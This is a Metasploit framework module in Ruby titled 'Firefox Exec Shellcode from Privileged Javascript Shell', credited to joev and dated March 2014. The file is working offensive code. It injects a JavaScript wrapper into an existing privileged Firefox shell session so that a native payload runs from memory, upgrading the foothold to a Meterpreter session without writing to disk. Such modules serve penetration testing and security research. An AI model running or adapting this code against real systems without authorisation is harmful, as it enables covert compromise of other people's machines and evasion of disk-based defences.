##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload/firefox'
class Metasploit3 < Msf::Exploit::Local
include Msf::Payload::Firefox
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
def initialize(info={})
super(update_info(info,
'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell',
'Description' => %q{
Allows execution of native payloads from a privileged Firefox Javascript shell.
Puts the specified payload into memory, adds the necessary protection flags,
and calls it. Useful for upgrading a Firefox javascript shell to a Meterpreter
session without touching the disk.
},
'License' => MSF_LICENSE,
'Author' => [ 'joev' ],
'Platform' => [ 'firefox' ],
'DisclosureDate' => 'Mar 10 2014',
'Targets' => [
[
'Native Payload', {
'Platform' => %w{ linux osx win unix },
'Arch' => ARCH_ALL
}
]
],
'DefaultTarget' => 0
))
register_options([
OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
], self.class)
end
def exploit
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
print_warning(results) if results.present?
end
def js_payload
%Q|
(function(send){
try {
#{run_payload}
send("Payload executed.");
} catch (e) {
send(e);
}
})(send);
|.strip
end
end